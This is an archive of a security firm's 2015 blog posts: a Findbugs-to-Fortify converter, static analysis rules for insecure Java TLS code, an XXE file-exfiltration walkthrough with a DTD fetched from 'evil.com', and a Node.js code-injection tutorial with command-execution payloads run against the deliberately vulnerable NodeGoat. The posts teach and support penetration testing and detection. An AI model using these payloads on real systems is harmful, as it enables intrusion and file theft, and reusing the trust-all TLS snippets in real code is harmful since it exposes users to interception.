Saturday, June 13, 2015

Converting Findbugs XML to HP Fortify SCA FPR

At GDS, we frequently encounter organizations with mature Secure Development Lifecycle (SDL) processes that have integrated HP Fortify to perform static code analysis. As discussed in a previous post, GDS often assists organizations by developing custom checks for security issues or insecure coding patterns identified during manual security code reviews. However, there are languages that Fortify does not directly support, making it difficult to integrate code written in those languages into an organization’s existing analysis framework.

Scala is one such language: it is not supported by Fortify, so other static analysis tools must be used to perform security checks. In a previous blog post, we discussed how the Findbugs static analysis tool can be used to analyze Scala application bytecode. But how can the Findbugs scan results be incorporated into an organization’s existing HP Fortify SSC server so the identified vulnerabilities can be managed there? We have written a lightweight Java tool that converts a Findbugs XML report into a Fortify FPR file, allowing the Findbugs results to be submitted to the SSC server as if the code had been scanned by HP Fortify SCA.

A Fortify FPR file is a compressed archive with a well-defined internal directory structure, as shown below:

[Screenshot: the internal directory structure of an FPR archive]

The result of the SCA analysis is stored in the audit.fvdl file in XML format. The tool we have developed takes a Findbugs XML report and transforms it into an FPR file.

The Findbugs XML is first merged with a messages.xml file containing the finding descriptions and recommendations, covering both the bundled Findbugs findings and the GDS-developed Scala ones. It is also possible to supply a custom messages.xml as input, which is particularly useful for adding write-ups for your own custom Findbugs rules.

The merged file is then transformed to the FVDL data structure through an XSL Transformation.

The XSLT processor takes the XML source document, plus an XSLT stylesheet, and processes them to produce an output document.

This audit.fvdl file is then added to a pre-packaged zip archive with the other required files.

In doing so, the transformation is completely decoupled from the code and depends only on the XSLT stylesheet used, which can be modified without recompiling the tool.
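For readers unfamiliar with JAXP, the transformation step can be sketched with the standard javax.xml.transform API; the file names below are illustrative rather than taken from the tool itself:

import javax.xml.transform.Transformer;
import javax.xml.transform.TransformerFactory;
import javax.xml.transform.stream.StreamResult;
import javax.xml.transform.stream.StreamSource;

public class FvdlTransform {
    public static void main(String[] args) throws Exception {
        // Load the stylesheet that maps the merged report to FVDL.
        Transformer t = TransformerFactory.newInstance()
                .newTransformer(new StreamSource("fvdl.xsl"));
        // Transform the merged Findbugs report into the FVDL structure.
        t.transform(new StreamSource("merged-report.xml"),
                new StreamResult("audit.fvdl"));
    }
}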

The application is packaged in a single runnable jar and can be used as follows:

$ java -jar convert2FPR.jar findbugs report.xml

To supply a custom messages.xml file, usage is as follows:

$ java -jar convert2FPR.jar findbugs messages.xml report.xml

The output file in both cases is ./report.fpr.

The first parameter (findbugs) represents the input format and maps to the corresponding XSL stylesheet (see the Java example below):

static {
    formats.put("findbugs", "com/gds/convert2fpr/findbugs/fvdl.xsl");
}

To extend the tool to support further input formats, only a new XSL stylesheet and one additional line in the above code are required for each new format.
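For example, adding support for a hypothetical new format would amount to one extra entry in that map (the format name and stylesheet path here are purely illustrative):

formats.put("someformat", "com/gds/convert2fpr/someformat/fvdl.xsl"); // hypothetical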

The source code and compiled tool can be found in our GitHub repository below:
https://github.com/GDSSecurity/Convert2FPR/

Monday, June 8, 2015

Fortify SCA Custom Rules for JSSE APIs Misuse

While delivering GDS secure SDLC services, we often develop a range of custom security checks and static analysis rules for detecting insecure coding patterns found during our source code security reviews. These patterns can represent either common security flaws or weaknesses specific to the application being assessed, its architecture/design, the components it uses, or even the development team itself. The custom rules are typically developed for a specific language and implemented within whichever static analysis tool our client is already using or is most comfortable with; previous examples include FindBugs, PMD, Visual Studio and of course Fortify SCA.

In this blog post I will focus on developing PoC rules for Fortify SCA targeting Java-based applications; however, the same concepts can easily be extended to other tools and development languages.

The recent vulnerability that affected Duo Mobile confirms the analysis of Georgiev et al., who demonstrated that a wide range of serious security flaws result from incorrect SSL/TLS certificate validation in various non-browser software, libraries and middleware.

Specifically, in this post we focus on how to identify insecure use of the SSL/TLS APIs in Java, which could enable man-in-the-middle or spoofing attacks by allowing a malicious host to impersonate a trusted one. Integrating HP Fortify SCA into the SDLC allows applications to be efficiently scanned for vulnerabilities on a regular basis. We found that issues caused by SSL API misuse are not identified by the out-of-the-box rule sets, so we developed a comprehensive pack of 12 custom rules for Fortify.

Secure Sockets Layer (SSL/TLS) is the most widely used protocol for secure communication over the web, using cryptographic processes to provide authentication, confidentiality, and integrity. To verify the identity of a party, X.509 certificates must be exchanged and validated. Once the parties are authenticated, the protocol provides an encrypted connection. The algorithms used in SSL include a secure hash function, which guarantees the integrity of the data.

When using SSL/TLS, the following two steps must be performed to ensure that no man-in-the-middle can tamper with the channel:

  • Certificate Chain-of-Trust verification: an X.509 certificate specifies the name of the certificate authority (CA) that issued it. The server also sends the client the certificates of the intermediate CAs all the way up to a root CA. The client verifies the signature and expiration (plus other properties out of scope for this post, such as revocation, basic constraints and policy constraints) of each certificate, starting from the server’s certificate at the bottom and going up to the root CA. If the algorithm reaches the last certificate in the chain with no violations, verification is successful.
  • Hostname Verification: after the chain of trust is established, the client must verify that the subject of the X.509 certificate matches the fully qualified DNS name of the requested server. RFC 2818 prescribes the use of subjectAltName, with the Common Name kept only for backwards compatibility.
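When the high-level HttpsURLConnection API is used with the platform defaults, both steps are performed automatically. A minimal sketch (the URL is illustrative):

import java.io.InputStream;
import java.net.URL;
import javax.net.ssl.HttpsURLConnection;

public class DefaultTlsClient {
    public static void main(String[] args) throws Exception {
        // The default trust manager verifies the certificate chain and
        // HttpsURLConnection verifies the hostname before data is exchanged.
        URL url = new URL("https://example.com/");
        HttpsURLConnection conn = (HttpsURLConnection) url.openConnection();
        try (InputStream in = conn.getInputStream()) {
            System.out.println("HTTP status: " + conn.getResponseCode());
        }
    }
}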

The following misuse cases can occur when the SSL/TLS APIs are not used securely; each can cause an application to transmit sensitive information over a compromised SSL/TLS channel.

Trusting All Certificates

The application implements a custom TrustManager whose logic trusts every presented server certificate without performing the Chain-of-Trust verification.

TrustManager[] trustAllCerts = new TrustManager[] {
    new X509TrustManager() {
        ...
        public void checkServerTrusted(X509Certificate[] certs,
                String authType) {}
    }
};

This pattern usually originates in development environments, where self-signed certificates are widely used. In our experience, developers commonly disable certificate validation altogether instead of loading the certificate into their keystore, and this dangerous coding pattern then accidentally makes its way into production releases.

When this occurs, it is similar to removing the batteries from a smoke detector: the detector (validation) is still there, providing a false sense of safety, but it will not detect the smoke (an untrusted party). In fact, when a client connects to a server, the validation routine will happily accept any server certificate.

A search on GitHub for the above vulnerable code returns 13,823 results. On StackOverflow, a number of questions ask how to ignore certificate errors and receive replies similar to the vulnerable code above. It is concerning that the most upvoted answers suggest disabling trust management entirely.
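The correct alternative in these environments is to import the self-signed certificate into a trust store instead of disabling validation. A minimal sketch, assuming the certificate sits in a local file server.crt (both the path and the alias are illustrative):

import java.io.FileInputStream;
import java.io.InputStream;
import java.security.KeyStore;
import java.security.cert.CertificateFactory;
import javax.net.ssl.SSLContext;
import javax.net.ssl.TrustManagerFactory;

public class PinnedTrust {
    public static SSLContext forSelfSignedCert() throws Exception {
        // Build an in-memory trust store containing only our certificate.
        KeyStore ks = KeyStore.getInstance(KeyStore.getDefaultType());
        ks.load(null, null);
        CertificateFactory cf = CertificateFactory.getInstance("X.509");
        try (InputStream in = new FileInputStream("server.crt")) { // illustrative path
            ks.setCertificateEntry("server", cf.generateCertificate(in));
        }
        // Standard chain-of-trust validation still runs, against this store.
        TrustManagerFactory tmf = TrustManagerFactory.getInstance(
                TrustManagerFactory.getDefaultAlgorithm());
        tmf.init(ks);
        SSLContext ctx = SSLContext.getInstance("TLS");
        ctx.init(null, tmf.getTrustManagers(), null);
        return ctx;
    }
}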

Allowing All Hostnames

The application does not check whether the digital certificate the server sends was issued for the host the client is connecting to.

The Java Secure Socket Extension (JSSE) provides two sets of APIs to establish secure communications, a high-level HttpsURLConnection API and a low-level SSLSocket API.

The HttpsURLConnection API performs hostname verification by default; again, this can be disabled by overriding the verify() method of the corresponding HostnameVerifier class (searching GitHub for the code below returns around 12,800 results).

HostnameVerifier allHostsValid = new HostnameVerifier() {
    public boolean verify(String hostname, SSLSession session) {
        return true;
    }
};

The SSLSocket API does not perform hostname verification out of the box. The snippet below is from Java 8: hostname verification is performed only if the endpoint identification algorithm is neither an empty String nor a NULL value.

private void checkTrusted(X509Certificate[] chain, String authType,
        SSLEngine engine, boolean isClient) throws CertificateException {
    ...
    String identityAlg = engine.getSSLParameters()
            .getEndpointIdentificationAlgorithm();
    if (identityAlg != null && identityAlg.length() != 0) {
        checkIdentity(session, chain[0], identityAlg, isClient,
                getRequestedServerNames(engine));
    }
    ...
}

When SSL/TLS clients use the raw SSLSocketFactory instead of the HttpsURLConnection wrapper, the identification algorithm is set to NULL and hostname verification is silently skipped. If an attacker holds a man-in-the-middle position on the network, then when a client connects to ‘domain.com’ the application will happily accept a valid server certificate issued for ‘some-evil-domain.com’.

This documented behavior is buried in the JSSE Reference Guide:

“When using raw SSLSocket and SSLEngine classes, you should always check the peer’s credentials before sending any data. The SSLSocket and SSLEngine classes do not automatically verify that the host name in a URL matches the host name in the peer’s credentials. An application could be exploited with URL spoofing if the host name is not verified.”
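Since Java 7, code using the raw socket classes can opt back in to hostname verification through SSLParameters; a minimal sketch:

import javax.net.ssl.SSLParameters;
import javax.net.ssl.SSLSocket;
import javax.net.ssl.SSLSocketFactory;

public class VerifiedSocket {
    public static SSLSocket connect(String host, int port) throws Exception {
        SSLSocketFactory factory = (SSLSocketFactory) SSLSocketFactory.getDefault();
        SSLSocket socket = (SSLSocket) factory.createSocket(host, port);
        SSLParameters params = socket.getSSLParameters();
        // Setting "HTTPS" makes the trust manager run the RFC 2818
        // hostname check during the handshake.
        params.setEndpointIdentificationAlgorithm("HTTPS");
        socket.setSSLParameters(params);
        socket.startHandshake(); // fails if the certificate does not match the host
        return socket;
    }
}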

Our contribution: Fortify SCA Rules

To detect the above insecure usages we have encoded the following checks in 12 custom rules for HP Fortify SCA. The rules identify issues in code relying on both JSSE and Apache HttpClient, since these are widely used libraries for thick clients and Android apps.

  • Over-Permissive Hostname Verifier: the rule fires when the code declares a HostnameVerifier whose verify() method always returns ‘true’.

<Predicate>
  <![CDATA[
Function f: f.name is "verify" and f.enclosingClass.supers 
contains [Class: name=="javax.net.ssl.HostnameVerifier" ] and 
f.parameters[0].type.name is "java.lang.String" and 
f.parameters[1].type.name is "javax.net.ssl.SSLSession" and 
f.returnType.name is "boolean" and f contains 
[ReturnStatement r: r.expression.constantValue matches "true"] 
  ]]>
</Predicate>
  • Over-Permissive Trust Manager: the rule fires when the code declares a TrustManager that never throws a CertificateException. Throwing the exception is how the API signals unexpected conditions.

<Predicate>
  <![CDATA[
Function f: f.name is "checkServerTrusted" and 
f.parameters[0].type.name is "java.security.cert.X509Certificate" 
and f.parameters[1].type.name is "java.lang.String" and 
f.returnType.name is "void" and not f contains [ThrowStatement t: 
t.expression.type.definition.supers contains [Class: name == 
"(javax.security.cert.CertificateException|java.security.cert.CertificateException)"]] 
  ]]>
</Predicate>
  • Missing Hostname Verification: the rule fires when the code uses the low-level SSLSocket API and does not set a HostnameVerifier.

  • Often Misused: Custom HostnameVerifier: the rule fires when the code uses the high-level HttpsURLConnection API and sets a custom HostnameVerifier.

  • Often Misused: Custom SSLSocketFactory: the rule fires when the code uses the high-level HttpsURLConnection API and sets a custom SSLSocketFactory.

We decided to fire the “often misused” rules because, when the application uses the high-level API, any overriding of these methods should be manually reviewed.

The rules pack is available on GitHub. These checks should always be performed during source code analysis to ensure the code does not introduce insecure SSL/TLS usage.

https://github.com/GDSSecurity/JSSE_Fortify_SCA_Rules
Sunday, May 31, 2015

CA Privilege Identity Manager Security Research Whitepaper

Today we are announcing the release of our latest whitepaper that includes the results of a research project performed for CA Technologies earlier this year. The focus of the research was to determine the effectiveness of the security controls provided by the CA Privilege Identity Manager (CA PIM) solution against attacks that target privileged identities.  Privilege Identity Management is an approach for reducing risk and securing super user accounts. These accounts are required in every IT organization for performing system administrator tasks and the CA PIM solution aims to provide access and account management through a variety of security controls.

The CA PIM components that were considered in scope for the research project were the following:

  • Fine-Grained Access Controls – Layers access controls on top of the native operating system for protecting privileged accounts. In the event a privileged account is compromised, access to the compromised system is restricted.

  • Granular Audit Logging – Provides audit logging or tracking identity and actions of privileged accounts even in shared account scenarios. Combined with enforced fine-grained access controls, this is intended to help with early detection of privileged account compromise.

  • Application Jailing – Provides the ability to enforce fine-grained access controls on applications and processes. By limiting the system resources that can be accessed by an application, those resources are inaccessible to an attacker in the event a vulnerability is exploited, including previously unknown 0-day vulnerabilities.

The research performed included the following major activities:

  • Learning PIM and Initial Setup - The GDS Labs research team started with zero knowledge of the platform and learned about its features and capabilities through setting up common deployment scenarios, reviewing administrator guides, and receiving guidance from CA PIM product support. Additionally, profiling of the relevant agent processes was performed to identify system resources accessed, network communications, etc.

  • Threat and Countermeasure Enumeration - Research activities investigated how CA PIM can be deployed to mitigate common security threat vectors and attacks that target privileged users. The threats and attacks were narrowed to those relevant to the in-scope CA PIM components. Various CA PIM access control policies and configuration settings were identified as potential countermeasures.

  • Solution Mitigation Verification - Selected validation testing was performed to determine the resiliency of configured CA PIM policies against common bypass techniques and exploits relevant to fine-grained access controls. Additionally, CA PIM’s intercepting kernel agent architecture as well as sudo, shell wrapper, and proxy control architectures were compared and evaluated to determine their resiliency to the threats and attacks.

A penetration testing assessment of the product was not performed as part of this phase of the research project. Recommendations for improving the security posture of the product were provided to CA where relevant.

The whitepaper containing the results from our research can be downloaded from our Github page:

https://github.com/GDSSecurity/Whitepapers/raw/master/GDS%20Labs%20-%20CA%20Technologies%20CA%20PIM%20Security%20Research%20White%20Paper.pdf

 

Wednesday, April 29, 2015

Automated Data Exfiltration with XXE

During a recent penetration test, GDS assessed an interesting RESTful web service that led to the development of a tool for automating the exploitation of an XXE (XML External Entity) processing vulnerability to exfiltrate data from the compromised system’s file system. In this post we will look at a sample web service that creates user accounts in order to demonstrate the usefulness of the tool.

The example request below shows four parameters in the body of the HTTP request:

PUT /api/user HTTP/1.1
Host: example.com
Content-Type: application/xml
Content-Length: 109

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<user>
    <firstname>John</firstname>
    <surname>Doe</surname>
    <email>[email protected]</email>
    <role>admin</role>
</user>

The associated HTTP response contains the id of the created account in addition to the parameters supplied in the request:

HTTP/1.1 200 OK
Date: Tue, 03 Mar 2015 10:57:28 GMT
Content-Type: application/xml
Content-Length: 557
Connection: keep-alive

{
    "userId": 123,
    "firstname": "John",
    "surname": "Doe",
    "email": "[email protected]",
    "role": "admin"
}

Note that the web service accepts both JSON and XML input, which explains why the response is JSON encoded. Supporting multiple data formats is becoming more common and was detailed in a recent blog post by Antti Rantasaari.
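For context, the attack below is possible when the server parses the request body with external entity resolution enabled, which is the default for a plain JAXP parser in Java. A hypothetical handler (not the actual service code) might look like this:

import java.io.InputStream;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;

public class UserEndpoint {
    // Hypothetical server-side handler for the PUT body shown above.
    Document parseUser(InputStream body) throws Exception {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        // Without hardening such as the following line, DOCTYPEs and
        // external entities in the request are resolved by the parser:
        // dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        return dbf.newDocumentBuilder().parse(body); // &xxe; expands here
    }
}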

A typical proof of concept for XXE is to retrieve the content of /etc/passwd, but with some XML parsers it is also possible to get directory listings. The following request defines the external entity “xxe” to contain the directory listing for “/etc/tomcat7/”:

PUT /api/user HTTP/1.1
Host: example.com
Content-Type: application/xml
Content-Length: 233

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/tomcat7/">
]>
<user>
    <firstname>John</firstname>
    <surname>&xxe;</surname>
    <email>[email protected]</email>
    <role>admin</role>
</user>

By referencing “&xxe;” in the surname element we should be able to see the directory listing in the response. Here it is:

 

HTTP/1.1 200 OK
Date: Tue, 03 Mar 2015 11:04:01 GMT
Content-Type: application/xml
Content-Length: 557
Connection: keep-alive

{
    "userId": 126,
    "firstname": "John",
    "surname": "Catalina\ncatalina.properties\ncontext.xml\nlogging.properties\npolicy.d\nserver.xml\ntomcat-users.xml\nweb.xml\n",
    "email": "[email protected]",
    "role": "admin"
}

The Tool

Now that we can get directory listings and retrieve files, the logical next step is to automate the process and download as many files as possible. The Python script linked below does exactly this. For example, we can mirror the directory “/etc/tomcat7/”:

# python xxeclient.py /etc/tomcat7/
2015-04-24 16:21:10,650 [INFO    ] retrieving /etc/tomcat7/
2015-04-24 16:21:10,668 [INFO    ] retrieving /etc/tomcat7/Catalina/
2015-04-24 16:21:10,690 [INFO    ] retrieving /etc/tomcat7/Catalina/localhost/
2015-04-24 16:21:10,696 [INFO    ] looks like a file: /etc/tomcat7/Catalina/localhost/
2015-04-24 16:21:10,699 [INFO    ] saving etc/tomcat7/Catalina/localhost
2015-04-24 16:21:10,700 [INFO    ] retrieving /etc/tomcat7/catalina.properties/
2015-04-24 16:21:10,711 [INFO    ] looks like a file: /etc/tomcat7/catalina.properties/
2015-04-24 16:21:10,714 [INFO    ] saving etc/tomcat7/catalina.properties
2015-04-24 16:21:10,715 [INFO    ] retrieving /etc/tomcat7/context.xml/
2015-04-24 16:21:10,721 [INFO    ] looks like a file: /etc/tomcat7/context.xml/
2015-04-24 16:21:10,721 [INFO    ] saving etc/tomcat7/context.xml

[…]

Now we can grep through the mirrored files to look for passwords and other interesting information. For example, the file “/etc/tomcat7/context.xml” may contain database credentials:

<?xml version="1.0" encoding="UTF-8"?>
<Context>
    <Resource name="jdbc/myDB"
              auth="Container"
              type="javax.sql.DataSource"
              username="sqluser"
              password="password"
              driverClassName="com.mysql.jdbc.Driver"
              url="jdbc:mysql://…"/>
</Context>

How it works

The XXE payload used in the above request effectively copies the content of the file into the “<surname>” tag. As a result, invalid XML (e.g. a file containing unmatched angle brackets) leads to parsing errors. Moreover, the application might ignore unexpected XML tags.

To overcome these limitations, the file content can be encapsulated in a CDATA section (an approach adopted from a presentation by Timothy D. Morgan). The following request declares four parameter entities; a fifth entity, “xxe”, is defined in the external DTD. The file content is loaded into “%file”, “%start” opens a CDATA section, and “%end” closes it. Finally, “%dtd” loads a specially crafted DTD file, which defines the entity “xxe” by concatenating “%start”, “%file” and “%end”. This entity is then referenced in the “<surname>” tag.

PUT /api/user HTTP/1.1
Host: example.com
Content-Type: application/xml
Content-Length: 378

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE updateProfile [
  <!ENTITY % file SYSTEM "file:///etc/tomcat7/context.xml">
  <!ENTITY % start "<![CDATA[">
  <!ENTITY % end "]]>">
  <!ENTITY % dtd SYSTEM "http://evil.com/evil.dtd">
%dtd;
]>
<user>
    <firstname>John</firstname>
    <surname>&xxe;</surname>
    <email>[email protected]</email>
    <role>admin</role>
</user>

This is the resource “evil.dtd” that is loaded from a web server we control:

<!ENTITY xxe "%start;%file;%end;">

The response actually contains the content of the configuration file “/etc/tomcat7/context.xml”.

HTTP/1.1 200 OK
Date: Tue, 03 Mar 2015 11:12:43 GMT
Content-Type: application/xml
Content-Length: 557
Connection: keep-alive

{
    "userId": 127,
    "firstname": "John",
    "surname": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<Context>\n<Resource name=\"jdbc/myDB\" auth=\"Container\" type=\"javax.sql.DataSource\" username=\"sqluser\" password=\"password\" driverClassName=\"com.mysql.jdbc.Driver\" url=\"jdbc:mysql://…\"/>\n</Context>",
    "email": "[email protected]",
    "role": "admin"
}

Caveats

Note that this technique only works if the server processing the XML input is allowed to make outbound connections to our server to fetch the file “evil.dtd”. Additionally, files containing ‘%’ (and in some cases ‘&’) signs or characters that are illegal in XML (e.g. bytes < 0x20) still result in a parsing error. Moreover, the sequence “]]>” causes problems because it terminates the CDATA section.

In the directory listing, there is no reliable way to distinguish between files and directories. The script assumes that files only contain alphanumerics, space and the following characters: “$.-_~”. Alternatively, we could also treat every file as a directory, iterate over its lines and try to download these possible files or subdirectories. However, this would result in too much overhead when encountering large files.
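As a rough illustration (re-implemented in Java here rather than taken from the Python script itself), that heuristic amounts to a single pattern match per listing entry:

import java.util.regex.Pattern;

public class ListingHeuristic {
    // Entries consisting only of alphanumerics, space and $.-_~ are
    // treated as file names; anything else is assumed to be a directory.
    private static final Pattern FILE_NAME =
            Pattern.compile("[A-Za-z0-9 $.\\-_~]+");

    public static boolean looksLikeFile(String entry) {
        return FILE_NAME.matcher(entry).matches();
    }
}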

The script is tailored for the above example, but by changing the XML template and the “_parse_response()” method it should be fairly easy to adapt it for another target.

The script is available on GitHub: https://github.com/GDSSecurity/xxe-recursive-download

Summary

One way to exploit XXE is to download files from the target server. Some parsers also return a directory listing. In this case we can use the presented script to recursively download whole directories. However, there are restrictions on the file content because certain characters can break the XML syntax.

Wednesday, April 15, 2015

Node.js Server-Side JavaScript Injection Detection & Exploitation

Late last year, Burp Scanner started testing for Server-Side JavaScript (SSJS) code injection. As you’d expect, this is where an attacker injects JavaScript into a server-side parser, resulting in arbitrary code execution.


Burp Scanner Detecting SSJS Code Injection

 

Burp uses arguably the best method there is for detecting SSJS code injection: time delays. This is more powerful than other methods (such as echoing content into the response) as it can detect evaluation in fully blind scenarios. Another reason for favouring time delay based detection is that there are a wealth of distinct server-side JavaScript solutions and the generic nature of time delay payloads means that they may be more likely to work across a range of diverse platforms. Conversely, exploitation payloads are more platform specific as typically they tie into API calls for file system access and command execution.

 

This time-based detection approach is, however, subject to false positives, so we need to be able to take a ‘lead’ like a time delay and verify its veracity by exploiting the vulnerability. For that, we need to develop manual detection and exploitation Server-Side JavaScript payloads.

 

In this blog post I’ll discuss some example manual detection techniques taken from a 2012 article by Felipe Aragon, and exploitation techniques taken from a 2011 paper by Bryan Sullivan. Finally, I’ll build upon what we’ve learned to finish with a couple of hacked-together, but functional, Server-Side JavaScript command ‘shells’.

 

Note that this blog post focuses on Node.js; if you find you can demonstrate JavaScript evaluation through time delays but none of the exploitation techniques shown here work, you may be looking at a different SSJS solution.

 

Combining User Input With Dangerous Functions

For demonstration purposes, we’ll use the highly recommended NodeGoat, a purposely vulnerable Node.js web application. The NodeGoat Contributions page is vulnerable to SSJS injection; this code snippet shows why:

 


The cause of the problem: NodeGoat’s contributions.js uses eval() to parse input  

 

The above code snippet, taken from the app/routes/contributions.js page, shows that the eval() function is used to parse user input; this is the root cause of the problem. Helpfully, an example solution is also provided in the NodeGoat source code: process user input using an alternative parser, in this case parseInt.

 

Manual Server Side JavaScript Injection Detection

So, let’s imagine we are on an engagement and have identified a potentially vulnerable SSJS injection vector. What now? Let’s simplify and repeat Burp’s time delay test manually in order to verify the results and understand what’s going on. Below is a request that will cause a 10 second time delay if the application is vulnerable:

 

Note: Newlines were added to attack strings within HTTP Requests for readability
POST /contributions HTTP/1.1
Host: 192.168.2.159:5000
Cookie: connect.sid=..snip..
Content-Type: application/x-www-form-urlencoded
Content-Length: 33
 
preTax=1;
var cd;
var d=new Date();
do{
cd=new Date();
}while(cd-d<10000)

 

The above payload (taken from an article by Felipe Aragon) declares two variables, cd and d, and stores the current time in d. A do-while loop is then entered that repeatedly obtains the current time until the current time is ten seconds greater than the stored time.

If executed, the payload will result in a delay of at least 10 seconds (plus the usual request round trip time). In SQL injection terms, this is more of a waitfor delay() than a benchmark(), in that the time delay is of fixed, attacker-definable duration.

 

Useful Error Messages and Enumeration of the Response Object Name

Before we move on to exploitation, let’s attempt to write output into a response. While this is not a requirement for exploitation, command execution vulnerabilities are much easier to exploit when they are non-blind. Extrapolating from the paper by Bryan Sullivan, we can use response.end() to write arbitrary content into the response:

 

POST /contributions HTTP/1.1
Host: 192.168.2.159:5000
Cookie: connect.sid=..snip..
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
 
preTax=1;response.end('testvalue9000')

This fails, returning a 500 error and the following message:

ReferenceError: response is not defined

This is both good and bad. ReferenceError is a great indicator that we are injecting into a Server-Side JavaScript parser, but the error indicates that response is not the correct name for the response object. NodeGoat uses the Express API, which follows the convention of referring to the response object as res rather than response. However, the Express API documentation goes on to make the point that this convention does not have to be followed, so keep in mind that the response object could be called anything. Let’s try calling res.end():

 

POST /contributions HTTP/1.1
Host: 192.168.2.159:5000
Cookie: connect.sid=..snip..
Content-Type: application/x-www-form-urlencoded
Content-Length: 33
 
preTax=1;res.end('testvalue9000')
 
HTTP/1.1 200 OK
X-Powered-By: Express
Date: Thu, 12 Feb 2015 14:33:56 GMT
Connection: keep-alive
Content-Length: 13
 
testvalue9000
 

Exploiting Server Side JavaScript Injection

Once we have enumerated the response object name and can write content into responses, we can read from, and write to, the file system using the techniques shown in Bryan Sullivan’s paper.

 

For example, let’s grab a directory listing of /etc/:

POST /contributions HTTP/1.1
Host: 192.168.2.159:5000
Cookie: connect.sid=..snip..
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
 
preTax=1;res.end(require('fs').readdirSync('/etc').toString())
 
HTTP/1.1 200 OK
X-Powered-By: Express
Date: Thu, 12 Feb 2015 14:37:12 GMT
Connection: keep-alive
Content-Length: 1439
 
.pwd.lock,X11,adduser.conf,alternatives,
apparmor,apparmor.d,apt,bash.bashrc,
bash_completion.d,bindresvport.blacklist,
blkid.conf,blkid.tab,ca-certificates,
ca-certificates.conf,console-setup,cron.d,
cron.daily,cron.hourly,cron.m
[... and so on ...]
 

As described in Bryan’s paper, we can ‘require’ new API modules as… well, required. As soon as I saw this I started looking for command execution API calls; sure enough, child_process allows us to make calls to the OS. For example, to blindly execute a command:

 

POST /contributions HTTP/1.1
Host: 192.168.2.159:5000
Cookie: connect.sid=..snip..
Content-Type: application/x-www-form-urlencoded
Content-Length: 88
 
preTax=1;
var exec = require('child_process').exec; 
var out = exec('touch /tmp/q234f');
 
bitnami@linux:/tmp$ ls
q234f
 

SSJS Command Execution With Stdout

Blind command execution is all well and good, but there’s nothing quite like the immediacy and convenience of command execution with stdout in the response. The request below (a dirty hack) pretty much achieves this.

 

The first time the request is submitted, the shell command is executed and the output is written to a file. You may also see an “Error: ENOENT, no such file or directory ‘/tmp/sddfr.txt’” message. The reason for this is the asynchronous nature of Node.js; this, the problems it causes for Node.js command shells, and the solution are all very well explained in this blog post by Bert Belder.

 

The second time the command is submitted, the shell output is read back from the file and written to the response. Of course, the location of the file may cause problems - an alternative approach would be to keep the file within the Node.js application directory (e.g. replace /tmp/sddfr.txt with sddfr.txt in the example below.)

 

POST /contributions HTTP/1.1
Host: 192.168.2.159:5000
Cookie: connect.sid=..snip..
Content-Type: application/x-www-form-urlencoded
Content-Length: 256
 
preTax=1;
var fs = require('fs');
var cat = require('child_process').spawn('uname', ['-a']);
cat.stdout.on('data', function(data) { 
fs.writeFile('/tmp/sddfr.txt', data)}); 
var out = fs.readFileSync('/tmp/sddfr.txt'); 
res.write(out); res.end()
 
HTTP/1.1 200 OK
X-Powered-By: Express
Date: Thu, 12 Feb 2015 14:54:56 GMT
Connection: keep-alive
Content-Length: 104
 
Linux linux 3.13.0-36-generic #63-Ubuntu SMP Wed Sep 3 21:30:07 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux

Our dirty hack is all very well, but the aforementioned blog post by Bert Belder heralds the arrival of execSync, “a Synchronous API for Child Processes”, in Node.js v0.12. This sounds much more elegant - let’s give it a try:

POST /contributions HTTP/1.1
Host: 192.168.2.159:5000
Cookie: connect.sid=..snip..
Content-Type: application/x-www-form-urlencoded
Content-Length: 86
 
preTax=2;
var asd = require('child_process').execSync('cat /etc/passwd');
res.write(asd)

Nope. This fails, returning a 500 error and the following message:

TypeError: Object #<Object> has no method 'execSync'

Wait - what version of Node.js is this?

POST /contributions HTTP/1.1
Host: 192.168.2.159:5000
Cookie: connect.sid=..snip..
Content-Type: application/x-www-form-urlencoded
Content-Length: 238
 
preTax=2;
var fs = require('fs');
var cat = require('child_process').spawn('node', ['-v']);
cat.stdout.on('data', function(data) { 
fs.writeFile('/tmp/sddfr.txt', data)}); 
var out = fs.readFileSync('/tmp/sddfr.txt'); 
res.write(out); res.end()
 
HTTP/1.1 200 OK
X-Powered-By: Express
Date: Sun, 22 Feb 2015 08:51:50 GMT
Connection: keep-alive
Content-Length: 9
 
v0.10.35
 

Node.js v0.10 doesn’t support execSync - good thing we have our dirty hack. We build a new server with Node.js v0.12.0 and try again:

POST /contributions HTTP/1.1
Host: 192.168.2.133:5000
Cookie: connect.sid=..snip..
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 88
 
preTax=2;
var asd = require('child_process').execSync('cat /etc/passwd');
res.write(asd)
 
HTTP/1.1 200 OK
X-Powered-By: Express
Date: Tue, 24 Feb 2015 20:40:07 GMT
Connection: keep-alive
Content-Length: 1966
 
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
[... and so on ...]
 

Wrap Up

So there it is. I’ve shown how to advance from automated time-based detection of SSJS injection (e.g. a Burp scan) to manual verification via time delays, writing to responses, accessing the server file system, and ultimately executing commands. Along the way, I’ve shown two potential barriers (the need to enumerate the correct response object name and the changing nature of the Node.js API) and offered suggestions for overcoming them.